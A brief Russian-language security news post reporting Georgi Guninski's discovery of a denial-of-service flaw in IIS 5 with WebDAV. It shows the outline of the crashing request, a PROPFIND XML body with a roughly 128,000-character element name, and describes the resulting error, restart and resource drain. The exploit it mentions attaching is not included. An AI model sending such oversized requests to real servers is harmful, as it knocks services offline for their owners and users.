Знаменитый Georgi Guninski
обнаружил очередную DoS дырку в IIS 5 с
включенным WebDAV. Длинный запрос типа
следующего:

<?xml version="1.0"?>
<a:propfind xmlns:a="DAV:" xmlns:u="over:"><a
:prop><a:displayname
/><u:<около 128008 символов>/></a:prop>
</a:propfind>

в первый раз вызовет ошибку с кодом 500, а во
второй перезапустит IIS (в случае Windows 2000 IIS
так же пожрет немерено памяти и
процессорного времени)
.

Эксплоит прилагаю.



Оставить мнение